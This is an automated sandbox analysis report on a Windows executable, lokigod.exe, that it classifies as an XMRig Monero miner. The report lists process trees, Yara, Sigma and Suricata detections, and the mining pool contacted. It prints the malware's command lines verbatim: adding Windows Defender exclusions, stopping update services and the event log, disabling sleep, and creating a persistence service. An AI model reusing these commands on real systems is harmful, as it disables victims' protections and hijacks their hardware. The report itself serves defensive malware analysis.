Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
lokigod.exe

Overview

General Information

Sample name:lokigod.exe
Analysis ID:1568489
MD5:769ea3d0e0cf22eaa7526a89c0f438cf
SHA1:5221042ad60744e2bdcf8319ff00bdbfc253eb59
SHA256:b369c94a835882a2267ff0a7a4ebb9a91621c3f134f63010d491121a7827b448
Tags:exeuser-aachum
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found strings related to Crypto-Mining
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspect Svchost Activity
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses powercfg.exe to modify the power settings
AV process strings found (often used to terminate AV products)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • lokigod.exe (PID: 7320 cmdline: "C:\Users\user\Desktop\lokigod.exe" MD5: 769EA3D0E0CF22EAA7526A89C0F438CF)
    • powershell.exe (PID: 7348 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7612 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 7708 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 7620 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7724 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7772 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7820 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7868 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7908 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7916 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7932 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7948 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 8004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7976 cmdline: C:\Windows\system32\sc.exe delete "LBFXRZGB" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 8116 cmdline: C:\Windows\system32\sc.exe create "LBFXRZGB" binpath= "C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 8168 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 8176 cmdline: C:\Windows\system32\sc.exe start "LBFXRZGB" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • vzppfnnlsyit.exe (PID: 5268 cmdline: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe MD5: 769EA3D0E0CF22EAA7526A89C0F438CF)
    • powershell.exe (PID: 5780 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2452 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 4268 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 7276 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7312 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5612 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6448 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 4676 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7488 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7492 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7508 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7544 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 7604 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • svchost.exe (PID: 7636 cmdline: svchost.exe MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000003B.00000002.3311685966.0000000140001000.00000040.00000001.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      0000003B.00000002.3311685966.0000000140001000.00000040.00000001.00020000.00000000.sdmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
      • 0x37eb98:$a1: mining.set_target
      • 0x370e20:$a2: XMRIG_HOSTNAME
      • 0x373748:$a3: Usage: xmrig [OPTIONS]
      • 0x370df8:$a4: XMRIG_VERSION
      Process Memory Space: svchost.exe PID: 7636JoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        Process Memory Space: svchost.exe PID: 7636MacOS_Cryptominer_Xmrig_241780a1unknownunknown
        • 0x614d7:$a1: mining.set_target
        • 0x5dc80:$a2: XMRIG_HOSTNAME
        • 0x5e9f8:$a3: Usage: xmrig [OPTIONS]
        • 0x5dc61:$a4: XMRIG_VERSION

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        59.2.svchost.exe.140000000.0.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          59.2.svchost.exe.140000000.0.unpackMacOS_Cryptominer_Xmrig_241780a1unknownunknown
          • 0x37ef98:$a1: mining.set_target
          • 0x371220:$a2: XMRIG_HOSTNAME
          • 0x373b48:$a3: Usage: xmrig [OPTIONS]
          • 0x3711f8:$a4: XMRIG_VERSION
          59.2.svchost.exe.140000000.0.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
          • 0x3c8ee1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
          59.2.svchost.exe.140000000.0.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
          • 0x3c9748:$s1: %s/%s (Windows NT %lu.%lu
          • 0x3cd180:$s3: \\.\WinRing0_
          • 0x376148:$s4: pool_wallet
          • 0x3705f0:$s5: cryptonight
          • 0x370600:$s5: cryptonight
          • 0x370610:$s5: cryptonight
          • 0x370620:$s5: cryptonight
          • 0x370638:$s5: cryptonight
          • 0x370648:$s5: cryptonight
          • 0x370658:$s5: cryptonight
          • 0x370670:$s5: cryptonight
          • 0x370680:$s5: cryptonight
          • 0x370698:$s5: cryptonight
          • 0x3706b0:$s5: cryptonight
          • 0x3706c0:$s5: cryptonight
          • 0x3706d0:$s5: cryptonight
          • 0x3706e0:$s5: cryptonight
          • 0x3706f8:$s5: cryptonight
          • 0x370710:$s5: cryptonight
          • 0x370720:$s5: cryptonight
          • 0x370730:$s5: cryptonight

          Sigma Signatures

          Change of critical system settings

          barindex
          Sigma detected: Disable power options
          Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\Desktop\lokigod.exe", ParentImage: C:\Users\user\Desktop\lokigod.exe, ParentProcessId: 7320, ParentProcessName: lokigod.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 7908, ProcessName: powercfg.exe

          System Summary

          barindex
          Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\lokigod.exe", ParentImage: C:\Users\user\Desktop\lokigod.exe, ParentProcessId: 7320, ParentProcessName: lokigod.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7348, ProcessName: powershell.exe
          Sigma detected: Suspect Svchost Activity
          Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe, ParentImage: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe, ParentProcessId: 5268, ParentProcessName: vzppfnnlsyit.exe, ProcessCommandLine: svchost.exe, ProcessId: 7636, ProcessName: svchost.exe
          Sigma detected: Powershell Defender Exclusion
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\lokigod.exe", ParentImage: C:\Users\user\Desktop\lokigod.exe, ParentProcessId: 7320, ParentProcessName: lokigod.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7348, ProcessName: powershell.exe
          Sigma detected: Uncommon Svchost Parent Process
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe, ParentImage: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe, ParentProcessId: 5268, ParentProcessName: vzppfnnlsyit.exe, ProcessCommandLine: svchost.exe, ProcessId: 7636, ProcessName: svchost.exe
          Sigma detected: New Service Creation Using Sc.EXE
          Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "LBFXRZGB" binpath= "C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "LBFXRZGB" binpath= "C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\lokigod.exe", ParentImage: C:\Users\user\Desktop\lokigod.exe, ParentProcessId: 7320, ParentProcessName: lokigod.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "LBFXRZGB" binpath= "C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe" start= "auto", ProcessId: 8116, ProcessName: sc.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\lokigod.exe", ParentImage: C:\Users\user\Desktop\lokigod.exe, ParentProcessId: 7320, ParentProcessName: lokigod.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7348, ProcessName: powershell.exe
          Sigma detected: Windows Processes Suspicious Parent Directory
          Source: Process startedAuthor: vburov: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe, ParentImage: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe, ParentProcessId: 5268, ParentProcessName: vzppfnnlsyit.exe, ProcessCommandLine: svchost.exe, ProcessId: 7636, ProcessName: svchost.exe

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Sigma detected: Stop EventLog
          Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\lokigod.exe", ParentImage: C:\Users\user\Desktop\lokigod.exe, ParentProcessId: 7320, ParentProcessName: lokigod.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 8168, ProcessName: sc.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-04T17:05:08.732115+010020362892Crypto Currency Mining Activity Detected192.168.2.5511721.1.1.153UDP
          2024-12-04T17:05:09.724782+010020362892Crypto Currency Mining Activity Detected192.168.2.5511721.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-04T17:05:12.220760+010028269302Crypto Currency Mining Activity Detected192.168.2.54970437.203.243.102443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for dropped file
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exeReversingLabs: Detection: 76%
          Multi AV Scanner detection for submitted file
          Source: lokigod.exeReversingLabs: Detection: 76%
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

          Bitcoin Miner

          barindex
          Yara detected Xmrig cryptocurrency miner
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Source: Yara matchFile source: 59.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000003B.00000002.3311685966.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7636, type: MEMORYSTR
          Found strings related to Crypto-Mining
          Source: svchost.exe, 0000003B.00000002.3311685966.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
          Source: svchost.exeString found in binary or memory: cryptonight-monerov7
          Source: svchost.exe, 0000003B.00000002.3311685966.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: -o, --url=URL URL of mining server
          Source: svchost.exe, 0000003B.00000002.3311685966.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
          Source: svchost.exe, 0000003B.00000002.3311685966.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
          Source: svchost.exe, 0000003B.00000002.3311685966.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
          Source: lokigod.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: vzppfnnlsyit.exe, 00000022.00000003.2161528296.000001CEAE950000.00000004.00000001.00020000.00000000.sdmp
          Source: Network trafficSuricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.5:51172 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.5:49704 -> 37.203.243.102:443
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficDNS traffic detected: DNS query: pool.hashvault.pro
          Source: vzppfnnlsyit.exe, 00000022.00000003.2161528296.000001CEAE950000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
          Source: vzppfnnlsyit.exe, 00000022.00000003.2161528296.000001CEAE950000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
          Source: vzppfnnlsyit.exe, 00000022.00000003.2161528296.000001CEAE950000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
          Source: vzppfnnlsyit.exe, 00000022.00000003.2161528296.000001CEAE950000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
          Source: svchost.exe, 0000003B.00000002.3311685966.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms
          Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 59.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: 59.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
          Source: 59.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
          Source: 0000003B.00000002.3311685966.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: Process Memory Space: svchost.exe PID: 7636, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Uses powercfg.exe to modify the power settings
          Source: C:\Users\user\Desktop\lokigod.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Windows\System32\conhost.exeCode function: 56_2_0000000140001394 NtFilterToken,56_2_0000000140001394
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exeFile created: C:\Windows\TEMP\gdtmkvyhysuy.sysJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_fd2v2404.w5x.ps1Jump to behavior
          Source: C:\Windows\System32\conhost.exeCode function: 56_2_000000014000324056_2_0000000140003240
          Source: C:\Windows\System32\conhost.exeCode function: 56_2_00000001400027D056_2_00000001400027D0
          Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\gdtmkvyhysuy.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
          Source: 59.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: 59.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
          Source: 59.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
